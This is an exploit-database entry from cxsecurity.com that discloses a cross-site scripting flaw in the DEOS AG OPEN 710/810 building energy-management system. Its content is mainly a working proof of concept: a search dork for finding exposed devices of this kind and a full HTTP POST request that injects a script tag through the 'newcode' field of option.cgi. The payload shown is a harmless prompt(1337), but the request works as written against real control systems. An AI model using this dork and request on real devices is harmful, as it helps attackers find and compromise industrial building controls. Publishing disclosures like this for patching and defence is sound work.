DEOS AG OPEN 710/810 Cross Site Scripting

2022.03.10
Credit: n4pst3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Title: DEOS control systems GmbH - OPEN 710/810 EMS > Cross Site Scripting Vulnerability # Dork: app:"DEOS AG OPEN EMS System ics device httpd" # Vendor page: https://www.deos-ag.com/en/ # Exploit Author: n4pst3r # Tested on: Debian POST /cgi-bin/option.cgi?function=2 HTTP/1.1 Content-Length: 83 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/cgi-bin/cosmobdf.cgi?function=%271&session=0&grafik=0 Host: localhost Connection: Keep-alive Accept-Encoding: gzip;deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML; like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* devcode_form=&lastcode_form=&newcode=94102_</script><script>prompt(1337)</script>


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top